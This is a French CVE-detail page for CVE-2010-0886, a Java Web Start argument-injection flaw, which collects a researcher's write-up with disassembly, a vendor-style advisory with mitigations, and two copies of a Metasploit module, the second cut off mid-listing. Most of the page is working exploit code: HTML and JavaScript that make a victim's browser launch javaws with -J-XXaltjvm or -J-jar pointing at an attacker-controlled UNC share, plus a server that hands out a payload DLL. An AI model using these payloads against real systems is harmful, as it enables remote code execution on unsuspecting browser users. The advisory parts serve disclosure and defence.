CVE-2010-0886 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Bye bye my little 0day :(, Tavis Ormandy did a great job uncovering a big logic flaw within Java JRE. I discovered that bug and other that affects every browser few weeks ago and I posted the common "0day++" tweet. The method in which Java Web Start support has been added to the JRE is not less than a deliberately embedded backdoor(I really don't think so) or a flagrant case of extreme negligence (+1). Let's see: Java Plugin for Browsers (Chrome,Firefox...) - Windows: npjp2.dll (The same for IE8's jp2iexp.dll) .text:6DAA3D96 .text:6DAA3D96 ; =============== S U B R O U T I N E ======================================= .text:6DAA3D96 .text:6DAA3D96 ; Attributes: bp-based frame .text:6DAA3D96 .text:6DAA3D96 sub_6DAA3D96 proc near ; CODE XREF: sub_6DAA2ACB+170p .text:6DAA3D96 .text:6DAA3D96 Data = byte ptr -264h .text:6DAA3D96 var_263 = byte ptr -263h .text:6DAA3D96 ApplicationName = byte ptr -160h .text:6DAA3D96 StartupInfo = _STARTUPINFOA ptr -5Ch .text:6DAA3D96 ProcessInformation= _PROCESS_INFORMATION ptr -18h .text:6DAA3D96 cbData = dword ptr -8 .text:6DAA3D96 hKey = dword ptr -4 .text:6DAA3D96 arg_0 = dword ptr 8 .text:6DAA3D96 arg_4 = dword ptr 0Ch .text:6DAA3D96 .text:6DAA3D96 push ebp .text:6DAA3D97 mov ebp, esp .text:6DAA3D99 sub esp, 264h .text:6DAA3D9F push edi .text:6DAA3DA0 lea eax, [ebp+hKey] .text:6DAA3DA3 push eax ; phkResult .text:6DAA3DA4 push 20019h ; samDesired .text:6DAA3DA9 xor edi, edi .text:6DAA3DAB push edi ; ulOptions .text:6DAA3DAC push offset SubKey ; "JNLPFile\\Shell\\Open\\Command" .text:6DAA3DB1 push 80000000h ; hKey .text:6DAA3DB6 mov [ebp+cbData], 104h .text:6DAA3DBD call ds:RegOpenKeyExA .text:6DAA3DC3 test eax, eax .text:6DAA3DC5 jz short loc_6DAA3DCE .text:6DAA3DC7 xor eax, eax .text:6DAA3DC9 jmp loc_6DAA3F16 The default handler is "javaws.exe",continuing... .text:6DAA3EB7 push [ebp+arg_4] .text:6DAA3EBA push eax .text:6DAA3EBB push offset aSDocbaseSS ; "\"%s\" -docbase %s %s" .text:6DAA3EC0 push esi ; LPSTR .text:6DAA3EC1 call ebx ; wsprintfA .text:6DAA3EC3 add esp, 14h .text:6DAA3EC6 jmp short loc_6DAA3ED4 .text:6DAA3EC8 ; --------------------------------------------------------------------------- .text:6DAA3EC8 .text:6DAA3EC8 loc_6DAA3EC8: ; CODE XREF: sub_6DAA3D96+11Fj .text:6DAA3EC8 push eax .text:6DAA3EC9 push offset aSS_0 ; "\"%s\" %s" .text:6DAA3ECE push esi ; LPSTR .text:6DAA3ECF call ebx ; wsprintfA .text:6DAA3ED1 add esp, 10h .text:6DAA3ED4 .text:6DAA3ED4 loc_6DAA3ED4: ; CODE XREF: sub_6DAA3D96+130j .text:6DAA3ED4 push 11h .text:6DAA3ED6 pop ecx .text:6DAA3ED7 xor eax, eax .text:6DAA3ED9 lea edi, [ebp+StartupInfo] .text:6DAA3EDC rep stosd .text:6DAA3EDE lea eax, [ebp+ProcessInformation] .text:6DAA3EE1 push eax ; lpProcessInformation .text:6DAA3EE2 xor ebx, ebx .text:6DAA3EE4 lea eax, [ebp+StartupInfo] .text:6DAA3EE7 push eax ; lpStartupInfo .text:6DAA3EE8 push ebx ; lpCurrentDirectory .text:6DAA3EE9 push ebx ; lpEnvironment .text:6DAA3EEA push ebx ; dwCreationFlags .text:6DAA3EEB push ebx ; bInheritHandles .text:6DAA3EEC push ebx ; lpThreadAttributes .text:6DAA3EED push ebx ; lpProcessAttributes .text:6DAA3EEE push esi ; lpCommandLine .text:6DAA3EEF lea eax, [ebp+ApplicationName] .text:6DAA3EF5 push eax ; lpApplicationName .text:6DAA3EF6 mov [ebp+StartupInfo.cb], 44h .text:6DAA3EFD call ds:CreateProcessA So basically the Java-Plugin Browser is running "javaws.exe" without validating command-line parameters. These parameters can be controlled by attackers via specially crafted embed html tags within a webpage. Let's see JavaDeploy.txt: if (browser == 'MSIE') { document.write('<' + 'object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" ' + 'width="0" height="0">' + '<' + 'PARAM name="launchjnlp" value="' + jnlp + '"' + '>' + '<' + 'PARAM name="docbase" value="' + jnlpDocbase + '"' + '>' + '<' + '/' + 'object' + '>'); } else if (browser == 'Netscape Family') { document.write('<' + 'embed type="application/x-java-applet;jpi-version=' + deployJava.firefoxJavaVersion + '" ' + 'width="0" height="0" ' + 'launchjnlp="' + jnlp + '"' + 'docbase="' + jnlpDocbase + '"' + ' />'); } That's it. This is how JAVA Plugin identifies Java Web Start content (jnlp files).So We can inject command-line parameters through "docbase" tag and even "launchjnlp". What type of arguments can we abuse to compromise a system? java.exe and javaw.exe support an undocumented-hidden command-line parameter "-XXaltjvm" and curiosly also "-J-XXaltjvm" (see -J switch in javaws.exe). This instructs Java to load an alternative JavaVM library (jvm.dll or libjvm.so) from the desired path. Game over. We can set -XXaltjvm=\\IP\evil , in this way javaw.exe will load our evil jvm.dll. Bye bye ASLR, DEP... Linux Same logic error, check this function "_Z10launchJNLPPKcS0" in libnpjp2.so MACOSX Not vulnerable. Workaround Disable javaws/javaws.exe in linux and Windows by any mean. Disable Deployment Toolkit to avoid unwanted installation as stated in Tavis' advisory.

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # # This module acts as an HTTP server # include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Sun Java Web Start Plugin Command Line Argument Injection', 'Description' => %q{ This module exploits a flaw in the Web Start plugin component of Sun Java Web Start. The arguments passed to Java Web Start are not properly validated. By passing the lesser known -J option, an attacker can pass arbitrary options directly to the Java runtime. By utilizing the -XXaltjvm option, as discussed by Ruben Santamarta, an attacker can execute arbitrary code in the context of an unsuspecting browser user. This vulnerability was originally discovered independently by both Ruben Santamarta and Tavis Ormandy. Tavis reported that all versions since version 6 Update 10 "are believed to be affected by this vulnerability." In order for this module to work, it must be ran as root on a server that does not serve SMB. Additionally, the target host must have the WebClient service (WebDAV Mini-Redirector) enabled. }, 'License' => MSF_LICENSE, 'Author' => 'jduck', 'References' => [ [ 'CVE', '2010-0886' ], [ 'CVE', '2010-1423' ], [ 'OSVDB', '63648' ], [ 'BID', '39346' ], [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2010-04/0122.html' ], [ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=67&Itemid=1' ] ], 'Platform' => 'win', 'Payload' => { 'Space' => 1024, 'BadChars' => '', 'DisableNops' => true, 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" }, 'Targets' => [ [ 'Automatic', { } ], [ 'Java Runtime on Windows x86', { 'Platform' => 'win', 'Arch' => ARCH_X86 } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 09 2010' )) register_options( [ OptPort.new('SRVPORT', [ true, "The daemon port to listen on", 80 ]), OptString.new('URIPATH', [ true, "The URI to use.", "/" ]), OptString.new('UNCPATH', [ false, 'Override the UNC path to use.' ]) ], self.class) end def auto_target(cli, request) agent = request.headers['User-Agent'] ret = nil #print_status("Agent: #{agent}") # Check for MSIE and/or WebDAV redirector requests if agent =~ /(Windows NT (5|6)\.(0|1|2)|MiniRedir\/(5|6)\.(0|1|2))/ ret = targets[1] elsif agent =~ /MSIE (6|7|8)\.0/ ret = targets[1] else print_status("Unknown User-Agent #{agent}") end ret end def on_request_uri(cli, request) # For this exploit, this does little besides ensures the user agent is a recognized one.. mytarget = target if target.name == 'Automatic' mytarget = auto_target(cli, request) if (not mytarget) send_not_found(cli) return end end # Special case to process OPTIONS for / if (request.method == 'OPTIONS' and request.uri == '/') process_options(cli, request, mytarget) return end # Discard requests for ico files if (request.uri =~ /\.ico$/i) send_not_found(cli) return end # If there is no subdirectory in the request, we need to redirect. if (request.uri == '/') or not (request.uri =~ /\/([^\/]+)\//) if (request.uri == '/') subdir = '/' + rand_text_alphanumeric(8+rand(8)) + '/' else subdir = request.uri + '/' end print_status("Request for \"#{request.uri}\" does not contain a sub-directory, redirecting to #{subdir} ...") send_redirect(cli, subdir) return else share_name = $1 end # dispatch WebDAV requests based on method first case request.method when 'OPTIONS' process_options(cli, request, mytarget) when 'PROPFIND' process_propfind(cli, request, mytarget) when 'GET' process_get(cli, request, mytarget, share_name) when 'PUT' print_status("Sending 404 for PUT #{request.uri} ...") send_not_found(cli) else print_error("Unexpected request method encountered: #{request.method}") end end # # GET requests # def process_get(cli, request, target, share_name) print_status("Responding to \"GET #{request.uri}\" request") # dispatch based on extension if (request.uri =~ /\.dll$/i) # # DLL requests sent by IE and the WebDav Mini-Redirector # print_status("Sending DLL") # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) # Generate a DLL based on the payload dll_data = generate_payload_dll({ :code => p.encoded }) # Send it :) send_response(cli, dll_data, { 'Content-Type' => 'application/octet-stream' }) else # # HTML requests sent by IE and Firefox # # This could probably use the Host header from the request my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] # Always prepare the UNC path, even if we dont use it for this request... if (datastore['UNCPATH']) unc = datastore['UNCPATH'].dup else unc = "\\\\" + my_host + "\\" + share_name end jnlp = "-J-XXaltjvm=" + unc + " -Xnosplash " + rand_text_alphanumeric(8+rand(8)) + ".jnlp" docbase = rand_text_alphanumeric(8+rand(8)) # Provide the corresponding HTML page... if (request.uri =~ /\.shtml/i) print_status("Sending JS version HTML") # Javascript version... var_str = rand_text_alpha(8+rand(8)) var_obj = rand_text_alpha(8+rand(8)) var_obj2 = rand_text_alpha(8+rand(8)) var_obj3 = rand_text_alpha(8+rand(8)) js_jnlp = "http: " js_jnlp << jnlp.dup.gsub("\\", "\\\\\\\\") # jeez # The 8ad.. CLSID doesn't support the launch method ... #clsid = '8AD9C840-044E-11D1-B3E9-00805F499D93' clsid = 'CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA' html = %Q|<html> <body>Please wait... <script language="javascript"> var #{var_str} = "#{js_jnlp}"; if (window.navigator.appName == "Microsoft Internet Explorer") { var #{var_obj} = document.createElement("OBJECT"); #{var_obj}.classid = "clsid:#{clsid}"; #{var_obj}.launch(#{var_str}); } else { try { var #{var_obj2} = document.createElement("OBJECT"); #{var_obj2}.type = "application/npruntime-scriptable-plugin;deploymenttoolkit"; document.body.appendChild(#{var_obj2}); #{var_obj2}.launch(#{var_str}); } catch (e) { var #{var_obj3} = document.createElement("OBJECT"); #{var_obj3}.type = "application/java-deployment-toolkit"; document.body.appendChild(#{var_obj3}); #{var_obj3}.launch(#{var_str}); } } </script> </body> </html> | elsif (request.uri =~ /\.htm/i) print_status("Sending non-JS version HTML") clsids = [ '8AD9C840-044E-11D1-B3E9-00805F499D93', 'CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA' ] clsid = clsids[rand(clsids.length)] html = %Q|<html> <body>Please wait... <object id="#{var_obj}" classid="clsid:#{clsid}" width="0" height="0"> <PARAM name="launchjnlp" value="#{jnlp}"> <PARAM name="docbase" value="#{docbase}"> </object> <embed type="application/x-java-applet" width="0" height="0" launchjnlp="#{jnlp}" docbase="#{docbase}" /> </body> </html> | else print_status("Sending js detection HTML") # NOTE: The JS version is preferred to the HTML version since it works on more JRE versions js_uri = rand_text_alphanumeric(8+rand(8)) + ".shtml" no_js_uri = rand_text_alphanumeric(8+rand(8)) + ".htm" html = %Q|<html> <head> <meta http-equiv="refresh" content="2;#{no_js_uri}" /> </head> <body> Please wait... <script language="javascript"> document.location = "#{js_uri}"; </script> </body> </html> | # end of detection html end send_response_html(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' }) end end # # OPTIONS requests sent by the WebDav Mini-Redirector # def process_options(cli, request, target) print_status("Responding to WebDAV \"OPTIONS #{request.uri}\" request") headers = { #'DASL' => '<DAV:sql>', #'DAV' => '1, 2', 'Allow' => 'OPTIONS, GET, PROPFIND', 'Public' => 'OPTIONS, GET, PROPFIND' } send_response(cli, '', headers) end # # PROPFIND requests sent by the WebDav Mini-Redirector # def process_propfind(cli, request, target) path = request.uri print_status("Received WebDAV \"PROPFIND #{request.uri}\" request") body = '' if (path =~ /\.dll$/i) # Response for the DLL print_status("Sending DLL multistatus for #{path} ...") #<lp1:getcontentlength>45056</lp1:getcontentlength> body = %Q|<?xml version="1.0" encoding="utf-8"?> <D:multistatus xmlns:D="DAV:"> <D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/"> <D:href>#{path}</D:href> <D:propstat> <D:prop> <lp1:resourcetype/> <lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate> <lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified> <lp1:getetag>"39e0132-b000-43c6e5f8d2f80"</lp1:getetag> <lp2:executable>F</lp2:executable> <D:lockdiscovery/> <D:getcontenttype>application/octet-stream</D:getcontenttype> </D:prop> <D:status>HTTP/1.1 200 OK</D:status> </D:propstat> </D:response> </D:multistatus> | elsif (path =~ /\/$/) or (not path.sub('/', '').index('/')) # Response for anything else (generally just /) print_status("Sending directory multistatus for #{path} ...") body = %Q|<?xml version="1.0" encoding="utf-8"?> <D:multistatus xmlns:D="DAV:"> <D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/"> <D:href>#{path}</D:href> <D:propstat> <D:prop> <lp1:resourcetype><D:collection/></lp1:resourcetype> <lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate> <lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified> <lp1:getetag>"39e0001-1000-4808c3ec95000"</lp1:getetag> <D:lockdiscovery/> <D:getcontenttype>httpd/unix-directory</D:getcontenttype> </D:prop> <D:status>HTTP/1.1 200 OK</D:status> </D:propstat> </D:response> </D:multistatus> | else print_status("Sending 404 for #{path} ...") send_not_found(cli) return end # send the response resp = create_response(207, "Multi-Status") resp.body = body resp['Content-Type'] = 'text/xml' cli.send_response(resp) end # # Make sure we're on the right port/path to support WebDAV # def exploit if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/' fail_with(Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/') end super end end

Java Deployment Toolkit Performs Insufficient Validation of Parameters ------------------------------------------------------------------------- Java Web Start (henceforth, jws) provides java developers with a way to let users launch and install their applications using a URL to a Java Networking Launching Protocol (.jnlp) file (essentially some xml describing the program). Since Java 6 Update 10, Sun has distributed an NPAPI plugin and ActiveX control called "Java Deployment Toolkit" to provide developers with a simpler method of distributing their applications to end users. This toolkit is installed by default with the JRE and marked safe for scripting. The launch() method provided by the toolkit object accepts a URL string, which it passes to the registered handler for JNLP files, which by default is the javaws utility. $ cmd /c ver Microsoft Windows XP [Version 5.1.2600] $ java -version java version "1.6.0_19" Java(TM) SE Runtime Environment (build 1.6.0_19-b04) Java HotSpot(TM) Client VM (build 16.2-b04, mixed mode, sharing) $ cat /proc/registry/HKEY_LOCAL_MACHINE/SOFTWARE/Classes/JNLPFile/Shell/Open/Command/\@ "C:\Program Files\Java\jre6\bin\javaws.exe" "%1" The toolkit provides only minimal validation of the URL parameter, allowing us to pass arbitrary parameters to the javaws utility, which provides enough functionality via command line arguments to allow this error to be exploited. The simplicity with which this error can be discovered has convinced me that releasing this document is in the best interest of everyone except the vendor. -------------------- Affected Software ------------------------ All versions since Java SE 6 update 10 for Microsoft Windows are believed to be affected by this vulnerability. Disabling the java plugin is not sufficient to prevent exploitation, as the toolkit is installed independently. http://java.sun.com/javase/6/docs/technotes/guides/jweb/deployment_advice.html I believe non-Windows installations are unaffected. -------------------- Consequences ----------------------- Exploitation of this issue is not terribly exciting, but is potentially of high enough impact to merit explanation. The javaws application supports the following command line parameters. $ javaws -help Usage: javaws [run-options] <jnlp-file> javaws [control-options] where run-options include: -verbose display additional output -offline run the application in offline mode -system run the application from the system cache only -Xnosplash run without showing a splash screen -J<option> supply option to the vm -wait start java process and wait for its exit control-options include: -viewer show the cache viewer in the java control panel -uninstall remove all applications from the cache -uninstall <jnlp-file> remove the application from the cache -import [import-options] <jnlp-file> import the application to the cache import-options include: -silent import silently (with no user interface) -system import application into the system cache -codebase <url> retrieve resources from the given codebase -shortcut install shortcuts as if user allowed prompt -association install associations as if user allowed prompt Perhaps the most interesting of these is -J, and the obvious attack is simply to add -jar followed by an attacker controlled UNC path to the jvm command line, which I've demonstrated below. Other attacks are clearly possible, but this is sufficient to demonstrate the problem. In order to trigger this attack in Internet Explorer, an attacker would use a code sequence like this /* ... */ var o = document.createElement("OBJECT"); o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA"; o.launch("http: -J-jar -J\\\\attacker.controlled\\exploit.jar none"); /* ... */ Or, for Mozilla Firefox /* ... */ var o = document.createElement("OBJECT"); o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit" document.body.appendChild(o); o.launch("http: -J-jar -J\\\\attacker.controlled\\exploit.jar none"); /* ... */ Please note, at some point the registered MIME type was changed to application/java-deployment-toolkit, please verify which type applies to your users when verifying any mitigation implemented has been effective (the simplest way would be to look at the output of about:plugins on a reference machine). A harmless demonstration is provided below. http://lock.cmpxchg8b.com/bb5eafbc6c6e67e11c4afc88b4e1dd22/testcase.html <html> <head><title>Java Deployment Toolkit Test Page</title></head> <body> <script> // Tavis Ormandy <[email protected]>, April 2010 var u = "http: -J-jar -J\\\\lock.cmpxchg8b.com\\calc.jar none"; if (window.navigator.appName == "Microsoft Internet Explorer") { var o = document.createElement("OBJECT"); o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA"; // Trigger the bug o.launch(u); } else { // Mozilla var o = document.createElement("OBJECT"); var n = document.createElement("OBJECT"); o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit"; n.type = "application/java-deployment-toolkit"; document.body.appendChild(o); document.body.appendChild(n); // Test both MIME types try { // Old type o.launch(u); } catch (e) { // New type n.launch(u); } } // Bonus Vulnerability, why not downgrade victim to a JRE vulnerable to // this classic exploit? // http://sunsolve.sun.com/search/document.do?assetkey=1-66-244991-1 // o.installJRE("1.4.2_18"); </script> </body> </html> ------------------- Mitigation ----------------------- If you believe your users may be affected, you should consider applying one of the workarounds described below as a matter of urgency. - Internet Explorer users can be protected by temporarily setting the killbit on CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA. To the best of my knowledge, the deployment toolkit is not in widespread usage and is unlikely to impact end users. - Mozilla Firefox and other NPAPI based browser users can be protected using File System ACLs to prevent access to npdeploytk.dll. These ACLs can also be managed via GPO. Detailed documentation on killbits is provided by Microsoft here http://support.microsoft.com/kb/240797 Domain administrators can deploy killbits and File System ACLs using GPOs, for more information on Group Policy, see Microsoft's Group Policy site, here http://technet.microsoft.com/en-us/windowsserver/bb310732.aspx You may be tempted to kill the HKLM\...\JNLPFile\Shell\Open\Command key, but the author does not believe this is sufficient, as the plugin also provides enough functionality to install and downgrade JRE installations without prompting (seriously). However, if none of your affected users are local Administrators, this solution may work (untested). As always, if you do not require this feature, consider permanently disabling it in order to reduce attack surface. ------------------- Solution ----------------------- Sun has been informed about this vulnerability, however, they informed me they do not consider this vulnerability to be of high enough priority to break their quarterly patch cycle. For various reasons, I explained that I did did not agree, and intended to publish advice to temporarily disable the affected control until a solution is available. ------------------- Credit ----------------------- This bug was discovered by Tavis Ormandy. This work is my own, and all of the opinions expressed are mine, not my employers or anybody elses (I added this for you, Dan. Thanks ;-)). ------------------- Greetz ----------------------- Greetz to Julien, Neel, Redpig, Lcamtuf, Spoonm, Skylined, asiraP, LiquidK, ScaryBeasts, Headhntr, Jagger, Sami and Roach. Some very elite friends have started a consultancy called inverse path, you should really hire them. http://www.inversepath.com/ ------------------- References ----------------------- - Deploying Java with JNLP, Sun Microsystems. http://java.sun.com/developer/technicalArticles/Programming/jnlp/ ------------------- Notes ----------------------- My advisories are intended to be consumed by a technical audience of security professionals and systems administrators who are familiar with the principal for which the mailing list you have subscribed to is named. If you do not fall into this category, you can get up to speed by reading this accessible and balanced essay on the disclosure debate by Bruce Schneier. http://www.schneier.com/crypto-gram-0111.html#1 Some of us would appreciate it if you made the effort to research and understand the issues involved before condemning us :-)

## # $Id: java_ws_arginject_altjvm.rb 10404 2010-09-21 00:13:30Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking # # This module acts as an HTTP server # include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Sun Java Web Start Plugin Command Line Argument Injection', 'Description' => %q{ This module exploits a flaw in the Web Start plugin component of Sun Java Web Start. The arguments passed to Java Web Start are not properly validated. By passing the lesser known -J option, an attacker can pass arbitrary options directly to the Java runtime. By utilizing the -XXaltjvm option, as discussed by Ruben Santamarta, an attacker can execute arbitrary code in the context of an unsuspecting browser user. This vulnerability was originally discovered independently by both Ruben Santamarta and Tavis Ormandy. Tavis reported that all versions since version 6 Update 10 "are believed to be affected by this vulnerability." In order for this module to work, it must be ran as root on a server that does not serve SMB. Additionally, the target host must have the WebClient service (WebDAV Mini-Redirector) enabled. }, 'License' => MSF_LICENSE, 'Author' => 'jduck', 'Version' => '$Revision: 10404 $', 'References' => [ [ 'CVE', '2010-0886' ], [ 'OSVDB', '63648' ], [ 'BID', '39346' ], [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2010-04/0122.html' ], [ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=67&Itemid=1' ] ], 'Platform' => 'win', 'Payload' => { 'Space' => 1024, 'BadChars' => '', 'DisableNops' => true, 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" }, 'Targets' => [ [ 'Automatic', { } ], [ 'Java Runtime on Windows x86', { 'Platform' => 'win', 'Arch' => ARCH_X86 } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 09 2010' )) register_options( [ OptPort.new('SRVPORT', [ true, "The daemon port to listen on", 80 ]), OptString.new('URIPATH', [ true, "The URI to use.", "/" ]), OptString.new('UNCPATH', [ false, 'Override the UNC path to use.' ]) ], self.class) end def auto_target(cli, request) agent = request.headers['User-Agent'] ret = nil #print_status("Agent: #{agent}") # Check for MSIE and/or WebDAV redirector requests if agent =~ /(Windows NT (5|6)\.(0|1|2)|MiniRedir\/(5|6)\.(0|1|2))/ ret = targets[1] elsif agent =~ /MSIE (6|7|8)\.0/ ret = targets[1] else print_status("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}") end ret end def on_request_uri(cli, request) # For this exploit, this does little besides ensures the user agent is a recognized one.. mytarget = target if target.name == 'Automatic' mytarget = auto_target(cli, request) if (not mytarget) send_not_found(cli) return end end # Special case to process OPTIONS for / if (request.method == 'OPTIONS' and request.uri == '/') process_options(cli, request, mytarget) return end # Discard requests for ico files if (request.uri =~ /\.ico$/i) send_not_found(cli) return end # If there is no subdirectory in the request, we need to redirect. if (request.uri == '/') or not (request.uri =~ /\/([^\/]+)\//) if (request.uri == '/') subdir = '/' + rand_text_alphanumeric(8+rand(8)) + '/' else subdir = request.uri + '/' end print_status("Request for \"#{request.uri}\" does not contain a sub-directory, redirecting to #{subdir} ...") send_redirect(cli, subdir) return else share_name = $1 end # dispatch WebDAV requests based on method first case request.method when 'OPTIONS' process_options(cli, request, mytarget) when 'PROPFIND' process_propfind(cli, request, mytarget) when 'GET' process_get(cli, request, mytarget, share_name) when 'PUT' print_status("Sending 404 for PUT #{request.uri} ...") send_not_found(cli) else print_error("Unexpected request method encountered: #{request.method}") end end # # GET requests # def process_get(cli, request, target, share_name) print_status("Responding to \"GET #{request.uri}\" request from #{cli.peerhost}:#{cli.peerport}") # dispatch based on extension if (request.uri =~ /\.dll$/i) # # DLL requests sent by IE and the WebDav Mini-Redirector # print_status("Sending DLL to #{cli.peerhost}:#{cli.peerport}...") # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) # Generate a DLL based on the payload dll_data = generate_payload_dll({ :code => p.encoded }) # Send it :) send_response(cli, dll_data, { 'Content-Type' => 'application/octet-stream' }) else # # HTML requests sent by IE and Firefox # my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] # Always prepare the UNC path, even if we dont use it for this request... if (datastore['UNCPATH']) unc = datastore['UNCPATH'].dup else unc = "\\\\" + my_host + "\\" + share_name end jnlp = "-J-XXaltjvm=" + unc + " -Xnosplash " + rand_text_alphanumeric(8+rand(8)) + ".jnlp" docbase = rand_text_alphanumeric(8+rand(8)) # Provide the corresponding HTML page... if (request.uri =~ /\.shtml/i) print_status("Sending JS version HTML to #{cli.peerhost}:#{cli.peerport}...") # Javascript version... var_str = rand_text_alpha(8+rand(8)) var_obj = rand_text_alpha(8+rand(8)) var_obj2 = rand_text_alpha(8+rand(8)) var_obj3 = rand_text_alpha(8+rand(8)) js_jnlp = "http: " js_jnlp << jnlp.dup.gsub("\\", "\\\\\\\\") # jeez # The 8ad.. CLSID doesn't support the launch method ... #clsid = '8AD9C840-044E-11D1-B3E9-00805F499D93' clsid = 'CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA' html = %Q|<html> <body>Please wait... <script language="javascript"> var #{var_str} = "#{js_jnlp}"; if (window.navigator.appName == "Microsoft Internet Explorer") { var #{var_obj} = document.createElement("OBJECT"); #{var_obj}.classid = "clsid:#{clsid}"; #{var_obj}.launch(#{var_str}); } else { try { var #{var_obj2} = document.createElement("OBJECT"); #{var_obj2}.type = "application/npruntime-scriptable-plugin;deploymenttoolkit"; document.body.appendChild(#{var_obj2}); #{var_obj2}.launch(#{var_str}); } catch (e) { var #{var_obj3} = document.createElement("OBJECT"); #{var_obj3}.type = "application/java-deployment-toolkit"; document.body.appendChild(#{var_obj3}); #{var_obj3}.launch(#{var_str}); } } </script> </body> </html> | elsif (request.uri =~ /\.htm/i) print_status("Sending non-JS version HTML to #{cli.peerhost}:#{cli.peerport}...") clsids = [ '8AD9C840-044E-11D1-B3E9-00805F499D93', 'CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA' ] clsid = clsids[rand(clsids.length)] html = %Q|<html> <body>Please wait... <object id="#{var_obj}" classid="clsid:#{clsid}" width="0" height="0"> <PARAM name="launchjnlp" value="#{jnlp}"> <PARAM name="docbase" value="#{docbase}"> </object> <embed type="application/x-java-applet" width="0" height="0" launchjnlp="#{jnlp}" docbase="#{docbase}" /> </body> </html> | else print_status("Sending js detection HTML to #{cli.peerhost}:#{cli.peerport}...") # NOTE: The JS version is preferred to the HTML version since it works on more JRE versions js_uri = rand_text_alphanumeric(8+rand(8)) + ".shtml" no_js_uri = rand_text_alphanumeric(8+rand(8)) + ".htm" html = %Q|<html> <head> <meta http-equiv="refresh" content="2;#{no_js_uri}" /> </head> <body> Please wait... <script language="javascript"> document.location = "#{js_uri}"; </script> </body> </html> | # end of detection html end send_response_html(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' }) end end # # OPTIONS requests sent by the WebDav Mini-Redirector # def process_options(cli, request, target) print_status("Responding to WebDAV \"OPTIONS #{request.uri}\" request from #{cli.peerhost}:#{cli.peerport}") headers = { #'DASL' => '<DAV:sql>', #'DAV' => '1, 2', 'Allow' => 'OPTIONS, GET, PROPFIND', 'Public' => 'OPTIONS, GET, PROPFIND' } send_response(cli, '', headers) end # # PROPFIND requests sent by the WebDav Mini-Redirector # def process_propfind(cli, request, target) path = request.uri print_status("Received WebDAV \"PROPFIND #{request.uri}\" request from #{cli.peerhost}:#{cli.peerport}") body = '' if (path =~ /\.dll$/i) # Response for the DLL print_status("Sending DLL multistatus for #{path} ...") #<lp1:getcontentlength>45056</lp1:getcontentlength> body = %Q|<?xml version="1.0" encoding="utf-8"?> <D:multistatus xmlns:D="DAV:"> <D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/"> <D:href>#{path}</D:href> <D:propstat> <D:prop> <lp1:resourcetype/> <lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate> <lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified> <lp1:getetag>"39e0132-b000-43c6e5f8d2f80"</lp1:getetag> <lp2:executable>F</lp2:executable> <D:lockdiscovery/> <D:getcontenttype>application/octet-stream</D:getcontenttype> </D:prop> <D:status>HTTP/1.1 200 OK</D:status> </D:propstat> </D:response> </D:multistatus> | elsif (path =~ /\/$/) or (not path.sub('/', '').index('/')) # Response for anything else (generally just /) print_status("Sending directory multistatus for #{path} ...") body = %Q|<?xml version="1.0" encoding="utf-8"?> <D:multistatus xmlns:D="DAV:"> <D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/"> <D:href>#{path}</D:href> <D:propstat> <D:prop> <lp1:resourcetype><D:collection/></lp1:resourcetype> <lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate> <lp1:getlastmodified>Fri, 26 